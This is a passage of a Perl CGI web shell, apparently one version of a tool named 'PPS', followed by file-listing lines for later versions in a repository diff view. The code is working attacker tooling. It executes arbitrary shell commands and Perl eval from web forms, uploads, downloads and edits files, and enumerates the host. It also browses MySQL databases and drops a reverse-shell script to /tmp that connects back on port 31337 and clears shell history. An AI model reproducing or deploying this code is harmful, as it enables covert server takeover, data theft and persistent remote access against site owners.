if($RunCommand eq "changedir"){$RunCommand="cd $ChangeDir";}elsif($RunCommand eq "makedir"){$RunCommand="mkdir $MkDir";}elsif($RunCommand eq "makefile"){$RunCommand="touch $MakeFile";}elsif($RunCommand eq "zip"){$RunCommand="tar cfz ".$ZipArch.".tar.gz ".$ZipFile;}elsif($RunCommand eq "unzip"){$RunCommand = "tar xfz ".$UnZipArch;}elsif($RunCommand eq "delfile"){$RunCommand="rm ".$DelFile;}elsif($RunCommand eq "deldir"){$RunCommand = "rm -rf ".$DelDir;}elsif($RunCommand eq "chmod_file"){my $tempt=$in{'chmod'};$RunCommand="chmod $tempt $path";}elsif($RunCommand eq "rename_file"){my $rtempt=$in{'rename_file'};$RunCommand="mv $path $CurrentDir/$rtempt";}elsif($RunCommand eq "touch_file"){my $ttempt=$in{'touch_file'};$ttempt=~s!\Q-!!g;$ttempt=~s!\Q:!!g;$ttempt=~s/ //g;my $ar=substr($ttempt,12);my $al=substr($ttempt,0,12);$ttempt=$al.".".$ar;$RunCommand = "touch -t $ttempt $path";}if($RunCommand =~ m/^\s*cd\s+(.+)/){$OldDir = $CurrentDir;$Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;chop($CurrentDir = `$Command`);&PrintPageHeader("c");file_header();print "<font size=1>";$Prompt = $WinNT ? "$OldDir> " : "[$ServerName $OldDir]\$ ";print "$Prompt $RunCommand";}else{&PrintPageHeader("c");file_header();print "<font size=1>";$Prompt = $WinNT ? "$CurrentDir> " : "[$ServerName $CurrentDir]\$ ";print "$Prompt $RunCommand<pre>";$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;if(!$WinNT){$SIG{'ALRM'} = \&CommandTimeout;alarm($CommandTimeoutDuration);}if($ShowDynamicOutput){$|=1;$Command .= " |";open(CommandOutput, $Command);while(<CommandOutput>){$_ =~ s/(\n|\r\n)$//;print "$_\n";}$|=0;}else{ print `$Command`;}if(!$WinNT){alarm(0);}print "</pre>";}print "</font>";&PrintCommandLineInputForm;&PrintPageFooter;}sub PrintDownloadLinkPage{local($FileUrl) = @_;if(-e $FileUrl){$FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;$DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";$HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";&PrintPageHeader("c");file_header();
print <<END;
<code><font size=1>Download File $TransferFile...</font><br></code>
END
&PrintCommandLineInputForm;&PrintPageFooter;}else{&PrintPageHeader("f");file_header();print "<code>Failed to download $FileUrl: $!</code>";&PrintFileDownloadForm;&PrintPageFooter;}}sub SendFileToBrowser{local($SendFile) = @_;if(open(SENDFILE, $SendFile)){if($WinNT){binmode(SENDFILE);binmode(STDOUT);}$FileSize = (stat($SendFile))[7];($Filename = $SendFile) =~ m!([^/^\\]*)$!;print "Content-Type: application/x-unknown\n";print "Content-Length: $FileSize\n";print "Content-Disposition: attachment; filename=$1\n\n";print while(<SENDFILE>);close(SENDFILE);}else{&PrintPageHeader("f");file_header();print "<code>Failed to download $SendFile: $!</code>";&PrintCommandLineInputForm;&PrintFileDownloadForm;&PrintPageFooter;}}sub BeginDownload{if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | (!$WinNT & ($TransferFile =~ m/^\//))){$TargetFile = $TransferFile;}else{chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;$TargetFile .= $PathSep.$TransferFile;}if($Options eq "go"){&SendFileToBrowser($TargetFile);}else{ &PrintDownloadLinkPage($TargetFile);}}sub SystemInfo{sub langs {$s = "which gcc;which perl;which python;which php;which tar;which zip";$s.=" -U $q{u}" if($q{u}); return $s;}sub hdd {$s = "df -h";$s.=" -U $q{u}" if($q{u});return $s;}sub perlv {$s = "perl -v";$s.=" -U $q{u}" if($q{u});return $s;}sub hosts {$s = "cat /etc/hosts";$s.=" -U $q{u}" if($q{u});return $s;}sub downloaders {$s = "which lynx;which links;which wget;which GET;which fetch;which curl";$s.=" -U $q{u}" if($q{u});return $s;}sub httpd {$s = "locate httpd.conf";$s.=" -U $q{u}" if($q{u});return $s;}$langs = langs();$httpd = httpd();$hdd = hdd();$perlv = perlv();$hosts = hosts();$downloaders = downloaders();&PrintPageHeader("c");print "<h1>System information</h1>";print '<font face="Verdana" size="1">';print "<b>Paths:</b>";P("<pre><font color='#E6DED8'>". `$langs`. "</font></pre>");print "<b>Downloaders:</b>";P("<pre><font color='#E6DED8'>". `$downloaders`. "</font></pre>");print "<b>httpd.conf:</b>";P("<pre><font color='#E6DED8'>". `$httpd`. "</font></pre>");print "<b>HDD:</b>";P("<pre><font color='#E6DED8'>". `$hdd`. "</font></pre>");print "<b>Perl version:</b>";P("<pre><font color='#E6DED8'>". `$perlv`. "</font></pre>");print "<b>/etc/hosts:</b>";P("<pre><font color='#E6DED8'>". `$hosts`. "</font></pre>");print '</font>';&PrintPageFooter;}sub sql_loginform{print "<h1>DataBases manager</h1>";&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};if (!$hhost){$hhost='localhost'};if (!$pport){$pport='3306'};if (!$usser){$usser='root'};
print <<END;
<form name='sf' method='post' action="$ScriptLocation"><table cellpadding='2' cellspacing='0'><tr><td>Type</td><td>Host</td><td>Port</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr><td><select name='type' id='nname'><option value='mysql' selected>MySql</option><option value='pgsql' >PostgreSql</option></select></td><td><input type=text name=sql_host value=$hhost></td><td><input type=text name=sql_port value=$pport></td><td><input type=text name=sql_login value=$usser></td><td><input type=text name=sql_pass value=$passs></td><td><input type=text name=sql_db value=$dbb></td><input type="hidden" name="d" value="$CurrentDir"><input type="hidden" name="a" value="sql_connect"><td><input type=submit value='>>'></td></tr></table></form><br><script>document.getElementById('nname').focus();</script>
END
}
sub sql{use DBI;&PrintPageHeader("p");sql_loginform();sql_query_form();&PrintPageFooter;}sub sql_vars_set{$hhost=$in{'sql_host'};$pport=$in{'sql_port'};$usser=$in{'sql_login'};$passs=$in{'sql_pass'};$dbb=$in{'sql_db'};}sub sql_query_form{
print <<END;
<form name='querys' method='post' action="$ScriptLocation"><textarea name='query' style='width:100%;height:60px'></textarea><br/>
<input type=submit value='Query'> <input type="hidden" name="d" value="$CurrentDir"><input type="hidden" name="a" value="sql_query"></form>
END
}
sub sql_cq_form {
print <<END;
<table><td><span>Get data from columns:</span></td><td><form name='cquerys' method='post' action="$ScriptLocation"><textarea name='cquery' id='cquery' cols=40 style='width:100%;height:60px'></textarea><br/><input type="hidden" name="a" value="sql_query">
<input type="hidden" name="d" value="$CurrentDir"><input type=submit value='Query'></form></td></table>
END
}
sub sql_databases_form{print '<tr><form method=post name=dd'.$$ref[0].' action="'.$ScriptLocation.'">';print '<input type="hidden" name="a" value="sql_databases">';print "<input type=hidden name=database value=$$ref[0]>";print '<input type="hidden" name="d" value="'.$CurrentDir.'">';print '<td></font><font face="Verdana" size="1">['.$s4et.']</font></td><td><a href="javascript:document.dd'.$$ref[0].'.submit()"><font face="Verdana" size="1">'.' '.$$ref[0].'</font></a></td>';print "</form></tr>";}
sub sql_tables_form {print '<tr><form method=post name=tt'.$$ref[0].' action='.$ScriptLocation.'>';print '<input type="hidden" name="a" value="sql_tables">';print "<input type=hidden name=table value=$$ref[0]>";print '<input type="hidden" name="d" value="'.$CurrentDir.'">';print '<td></font><font face="Verdana" size="1">['.$s4et.']</font></td><td><a href="javascript:document.tt'.$$ref[0].'.submit()"><font face="Verdana" size="1">'.' '.$$ref[0].'</font></a></td>';print "</form></tr>";}
sub sql_columns_form{print '<script>function lol'.$s4et.'(f){if (f.checked){var cn=document.getElementById("cquery").value;if (cn!==""){document.cquerys.cquery.value=cn+","+f.id;}else{document.cquerys.cquery.value=f.id;}}else{exit;}}</script>';print '<tr><form method=post name=cc'.$$ref[0].' action='.$ScriptLocation.'>';print '<input type="hidden" name="a" value="sql_columns">';print '<input type=hidden name=column value='.$$ref[0].'>';print '<input type="hidden" name="d" value="'.$CurrentDir.'">';print '<td></font><font face="Verdana" size="1">['.$s4et.']</font></td><td><input type=checkbox id='.$$ref[0].' name=c'.$$ref[0].' onClick="lol'.$s4et.'(this.form.c'.$$ref[0].')"></td><td><a href="javascript:document.cc'.$$ref[0].'.submit()"><font face="Verdana" size="1">'.$$ref[0].'</font></a></td>';print "</form><tr>";}
sub sql_data_form {print '<tr><form method=post name=dt'.$$ref[0].' action='.$ScriptLocation.'>';print '<input type="hidden" name="d" value="'.$CurrentDir.'">';print "<td><font face='Verdana' size='1'>[$s4et] </font></td><td><font face='Verdana' size='1'>$$ref[0]</font></td>";print "</form></tr>";}
sub NetPrint{&PrintPageHeader("p");NetForm();&PrintPageFooter;}
sub NetForm {$rip = $ENV{'REMOTE_ADDR'};
print <<END;
<h1>Back-connect [perl]</h1><br/><form name='nfp' method=post action=$ScriptLocation>Server: <input type='text' name='server' value=$rip> Port: <input type='text' name='ppport' value=31337><input type="hidden" name="a" value="net_go"><input type=submit value='>>'></form><br>
END
}
sub back{open(FILE,">/tmp/bbc.pl");$bbc = '#!/usr/bin/perl
use IO::Socket;$system = "/bin/bash";use Socket;use FileHandle;socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or die print "[-] Unable to Resolve Host\n";connect(SOCKET, sockaddr_in("'.$port.'", inet_aton("'.$target.'"))) or die print "[-] Unable to Connect Host\n";SOCKET->autoflush();open(STDIN, ">&SOCKET");open(STDOUT,">&SOCKET");open(STDERR,">&SOCKET");system("unset HISTFILE; unset SAVEHIST ;echo PPS 1.0 backconnect:;pwd;");system($system);';print FILE $bbc;close(FILE);system("chmod 777 /tmp/bbc.pl;perl /tmp/bbc.pl $target $port");exit;}
sub NetGo{&PrintPageHeader("c");$target = $in{'server'};$port = $in{'ppport'};NetForm();back();&PrintPageFooter;}
sub EvalCodePrint{&PrintPageHeader("p");EvalCodeForm();&PrintPageFooter;}
sub EvalCodeForm{
print <<END;
<h1>Execution PERL-code</h1><form name=pf method=post action=$ScriptLocation><textarea name=code class=bigarea id=PerlCode></textarea><input type="hidden" name="a" value="eval_code"><input type=submit value=Eval style="margin-top:5px">
END
}
sub EvalCode{&PrintPageHeader("c");EvalCodeForm();$ccode = $in{'code'};print "<br>Result:<br>";eval $ccode;&PrintPageFooter;}
sub EditFilePathForm {
print <<END;
<code><br><form name=pfsd method=post action=$ScriptLocation>$Prompt<input type="text" name=path id=edit1_file><input type="hidden" name="a" value="edit_file_path"><input type="hidden" name="d" value="$CurrentDir"><input type=submit value=MakeDir></form></code>
END
}
sub EditFilePath{$fpath = $in{'d'} . "/". $in{'path'};EditFilePrint();}
sub EditFilePrint{&PrintPageHeader("p");EditFileForm();&PrintPageFooter;}
sub EditFileForm{open(FILE, $fpath);@file = <FILE>;$fccodde = HtmlSpecialChars(join('', @file));
print <<END;
<h1>Edit File: $fpath</h1><form name=pf11 method=post action=$ScriptLocation><textarea name=ccode class=bigarea id=editfile>$fccodde</textarea><input type="hidden" name="a" value="edit_file"><input type=hidden name=path value=$fpath><input type="hidden" name="d" value="$CurrentDir"><input type=submit value=Save style="margin-top:5px"></form>
END
}
sub ViewFile{$fpath = $CurrentDir."/".$ViewF;&PrintPageHeader("c");open(FILE, $fpath);@file = <FILE>;$fccodde = join('', @file);
$fccodde = HtmlSpecialChars($fccodde);
print <<END;
<h1>View File: $fpath</h1><span>htmlspecialchars:</span><br><textarea name=view class=bigarea>$fccodde</textarea></form>
END
&PrintPageFooter;
}
sub EditFile {&PrintPageHeader("c");$fccode = $in{'ccode'};$ffpath = $in{'path'};
print <<END;
<h1>Edit File: $ffpath</h1><form name=pf11 method=post action=$ScriptLocation><textarea name=ccode class=bigarea id=editfile>$fccode</textarea><input type="hidden" name="a" value="edit_file"><niput type=hidden name=path value=$ffpath><input type="hidden" name="d" value="$CurrentDir"><input type=submit value=Save style="margin-top:5px"></form>
END
open(FFF,"> $ffpath");print FFF DeHtmlSpecialChars($fccode);close(FFF);print "File $ffpath saved";&PrintPageFooter;}
sub sql_columns{&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};
$dbb=$Cookies{'dbb'};$table=$Cookies{'table'};&PrintPageHeader("c");sql_vars_set();sql_loginform();$column=$in{'column'};
print <<END;
<SCRIPT LANGUAGE="JavaScript">function setCookie (name, value, expires, path, domain, secure){document.cookie=name+"="+escape(value)+((expires) ? "; expires=" + expires : "")+((path) ? "; path=" + path : "")+((domain) ? "; domain=" + domain : "")+ ((secure) ? "; secure" : "");}setCookie("column", "$column", "", "/");</SCRIPT>
END
print "<table width=100%>";print '<font face="Verdana" size="1">';$dbh = DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth = $dbh->prepare("SHOW DATABASES");$sth->execute;print "<b>DATABASES:</b><br>";print "<td><table border=1 cellspacing=0 cellpadding=1>";while ($ref = $sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "</table></td><td><table width=100%>";sql_query_form();print "</table></td></table>";$s4et = 0;$sth = $dbh->prepare("SHOW TABLES FROM $dbb");$sth->execute;print "</table>";print "<b>Tables from $dbb:</b><br>";print "<table border=1 cellspacing=0 cellpadding=1 cols=4>";print "<td><table border=1 cellspacing=0 cellpadding=1 cols=2>";while ($ref = $sth->fetchrow_arrayref){
$s4et++;sql_tables_form();}$rc=$sth->finish;print "</table></td><td><table border=1 cellspacing=0 cellpadding=1 cols=2>";$s4et=0;
$sth = $dbh->prepare("show columns from $table from $dbb");$sth->execute;while ($ref = $sth->fetchrow_arrayref){$s4et++; sql_columns_form();}$rc=$sth->finish;print "</table></td>";$s4et = 0;$zapros = "SELECT $column FROM `".$dbb."`.`".$table."` LIMIT 0,30";print '<script>document.querys.query.value="'.$zapros.'";</script>';$sth = $dbh->prepare($zapros);$sth->execute;print "<td><table border=1 cellspacing=0 cellpadding=1 cols=2>";while ($ref = $sth->fetchrow_arrayref){$s4et++;sql_data_form();}$rc = $sth->finish;$rc=$dbh->disconnect;print "</table></td></table>";&PrintPageFooter;}sub sql_tables{&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};&PrintPageHeader("c");
sql_vars_set();sql_loginform();$qqquery = $in{'table'};
print <<END;
<SCRIPT LANGUAGE="JavaScript">function setCookie (name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires) ? ";expires="+expires:"")+((path) ? ";path="+path:"")+((domain) ? ";domain="+domain:"")+((secure) ? ";secure":"");}
setCookie("table", "$qqquery", "", "/");</SCRIPT>
END
print "<table width=100%>";print '<font face="Verdana" size="1">';$dbh = DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth=$dbh->prepare("SHOW DATABASES");$sth->execute;print "<b>DATABASES:</b><br>";print "<td><table border=1 cellspacing=0 cellpadding=1>";while ($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "</table></td><td><table width=100%><td>";sql_cq_form();print "</td><td>";sql_query_form();print "</td></table></td></table>";$s4et=0;$sth=$dbh->prepare("SHOW TABLES FROM $dbb");$sth->execute;print "<b>Tables from $dbb:</b><br>";print "<table border=1 cellspacing=0 cellpadding=1 cols=4>";print "<td><table border=1 cellspacing=0 cellpadding=1 cols=2>";while ($ref = $sth->fetchrow_arrayref){$s4et++;sql_tables_form();}$rc=$sth->finish;print "</table></td><td><table border=1 cellspacing=0 cellpadding=1 cols=2>";$s4et=0;$zapros = "SHOW COLUMNS FROM `$qqquery` FROM `$dbb`";print '<script>document.querys.query.value="'.$zapros.'";</script>';$sth=$dbh->prepare($zapros);$sth->execute;while ($ref = $sth->fetchrow_arrayref){$s4et++;sql_columns_form();}$rc=$sth->finish;$rc=$dbh->disconnect;print "</table></td></table>";&PrintPageFooter;}
sub sql_databases{sql_vars_set();&PrintPageHeader("c");sql_vars_set();sql_loginform();$ddb = $in{'database'};
print <<END;
<SCRIPT LANGUAGE="JavaScript">function setCookie (name,value,expires,path,domain,secure){document.cookie = name+"="+escape(value) +((expires) ? ";expires="+expires:"")+((path) ? "; path="+path:"")+((domain) ? ";domain="+domain:"")+((secure) ? ";secure":"");}setCookie("dbb","$ddb","","/");</SCRIPT>
END
print "<table width=100%>";print '<font face="Verdana" size="1">';$dbh = DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth = $dbh->prepare("SHOW DATABASES");$sth->execute;print "<b>DATABASES:</b><br>";print "<td><table border=1 cellspacing=0 cellpadding=1>";while ($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "</table></td><td><table width=100%>";sql_query_form();print "</table></td></table>";$s4et=0;$zapros = "SHOW TABLES FROM `$ddb`";print '<script>document.querys.query.value="'.$zapros.'";</script>';$sth=$dbh->prepare($zapros);$sth->execute;print "</table>";print "<b>Tables from $ddb:</b><br>";print " <table border=1 cellspacing=0 cellpadding=1 cols=10>";while ($ref=$sth->fetchrow_arrayref){$s4et++;sql_tables_form();}$s4et=0;$rc=$sth->finish;$rc=$dbh->disconnect;print "</table>";&PrintPageFooter;}
sub sql_set_cookie{print "Set-Cookie: hhost=$hhost;\n";print "Set-Cookie: pport=$pport;\n";print "Set-Cookie: usser=$usser;\n";print "Set-Cookie: passs=$passs;\n";print "Set-Cookie: dbb=$dbb;\n";}
sub sql_query{sql_vars_set();&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};$table=$Cookies{'table'};&PrintPageHeader("c");sql_vars_set();sql_loginform();$qquery=$in{'cquery'};if ($qquery){$qquery="SELECT CONCAT_WS(0x3a,$qquery) FROM `$dbb`.`$table` LIMIT 0,30";}else{$qquery = $in{'query'};}$dbh = DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth=$dbh->prepare("SHOW DATABASES");$sth->execute;print '<font face="Verdana" size="1">';print "<table width=100% cellspacing=0 cellpadding=1 cols=2>";print "<b>DATABASES:</b>";print "<td><table border=1 cellspacing=0 cellpadding=1>";while ($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "</table></td><td><table width=100%>";sql_query_form();print "</table></td></table>";$s4et=0;$sth = $dbh->prepare($qquery);$sth->execute;print "<b>Results:</b><br>";print " <table border=1 cellspacing=0 cellpadding=1 cols=10>";while ($ref=$sth->fetchrow_arrayref){$s4et++;print "<tr><td><font face=Verdana size=1>[$s4et]</font></td><td><font face=Verdana size=1>$$ref[0]</font></td></tr>";}$s4et=0;$rc=$sth->finish;$rc=$dbh->disconnect;print "</table>";print '<script>document.querys.query.value="'.$qquery.'";</script>';&PrintPageFooter;}
sub sql_connect{sql_vars_set();sql_set_cookie();&PrintPageHeader("c");sql_loginform();sql_vars_set();$s4et=0;$dbb="";$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);if($hhost && $pport && $usser && $passs){$zapros = "SHOW DATABASES";print '<script>document.querys.query.value="'.$zapros.'";</script>';$sth = $dbh->prepare($zapros);$sth->execute;print '<font face="Verdana" size="1">';print "<table width=100%>";print "<b>DATABASES:</b>";print "<td><table border=1 cellspacing=0 cellpadding=1>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "</table></td><td>"; sql_query_form();print "</td></table>";$rc = $dbh->disconnect;print '</font>';return;}print "Some error...";print '</font>';&PrintPageFooter;}
sub UploadFile{if($TransferFile eq ""){&PrintPageHeader("f");file_header();&PrintCommandLineInputForm;&PrintFileUploadForm;&PrintPageFooter;return;}&PrintPageHeader("c");file_header();print "<font size=1>Uploading $TransferFile to $CurrentDir...<br>";chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;$TransferFile =~ m!([^/^\\]*)$!;$TargetName .= $PathSep.$1;$TargetFileSize = length($in{'filedata'});if(open(UPLOADFILE, ">$TargetName")){binmode(UPLOADFILE) if $WinNT;print UPLOADFILE $in{'filedata'};close(UPLOADFILE);print "Transfered $TargetFileSize Bytes.<br>";print "File Path: $TargetName<br>";}else{print "Failed: $!<br>";}print "</font>";&PrintCommandLineInputForm;&PrintPageFooter;}
sub DownloadFile{if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | (!$WinNT & ($TransferFile =~ m/^\//))){$TargetFile=$TransferFile;
}else{chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;$TargetFile .= $PathSep.$TransferFile;}if($Options eq "go"){
&SendFileToBrowser($TargetFile);}else{&PrintDownloadLinkPage($TargetFile);}}
sub Remove{use Cwd qw(abs_path);my $path = abs_path($0);system("rm $path");}
&ReadParse;&GetCookies;$ScriptLocation=$ENV{'SCRIPT_NAME'};$ServerName=$ENV{'SERVER_NAME'};$LoginPassword=$in{'p'};$RunCommand=$in{'c'};$RunCommand1=$in{'aliases'};if($RunCommand1){$RunCommand=$RunCommand1}$ChangeDir=$in{'cc'};$ZipFile=$in{'zip'};$ZipArch=$in{'arh_name'};$UnZipArch=$in{'unzip_name'};$DelFile=$in{'del_file'};$DelDir=$in{'del_dir'};$MkDir=$in{'md'};$ViewF=$in{'path'};$Fchmod=$in{'fchmod'};$Fdata=$in{'fdata'};$MakeFile=$in{'mf'};$TransferFile=$in{'f'};$Options=$in{'o'};$Action=$in{'a'};$Action="filemanager" if($Action eq "");$CurrentDir=$in{'d'};chop($CurrentDir=`$CmdPwd`) if($CurrentDir eq "");$LoggedIn=$Cookies{'SAVEDPWD'} eq $Password;if($Action eq "login" || !$LoggedIn){&PerformLogin;}elsif($Action eq "command"){&ExecuteCommand;}elsif($Action eq "RT"){&RT;}elsif($Action eq "view_file"){&ViewFile;}elsif($Action eq "command1"){&ExecuteCommand1;}elsif($Action eq "filemanager"){&FileManager;}elsif($Action eq "console"){&Console;}elsif($Action eq "upload"){&UploadFile;}elsif($Action eq "download"){&DownloadFile;}elsif($Action eq "systeminfo"){&SystemInfo;}elsif($Action eq "code"){&EvalCodePrint;}elsif($Action eq "eval_code"){&EvalCode;}elsif($Action eq "net"){&NetPrint;}elsif($Action eq "net_go"){&NetGo;}elsif($Action eq "sql"){&sql;}elsif($Action eq "sql_connect"){&sql_connect;}elsif($Action eq "sql_query"){&sql_query;}elsif($Action eq "remove"){&Remove;}elsif($Action eq "edit_file"){&EditFile;}elsif($Action eq "edit_file_path"){&EditFilePath;}elsif($Action eq "sql_databases"){&sql_databases;}elsif($Action eq "sql_tables"){&sql_tables;}elsif($Action eq "sql_columns"){&sql_columns;}elsif($Action eq "logout"){&PerformLogout;}

78
pl/pps-pl/pps-v3.0.pl Normal file
View file

File diff suppressed because one or more lines are too long

79
pl/pps-pl/pps-v3.5.pl Normal file
View file

File diff suppressed because one or more lines are too long

82
pl/pps-pl/pps-v4.0.pl Normal file
View file

File diff suppressed because one or more lines are too long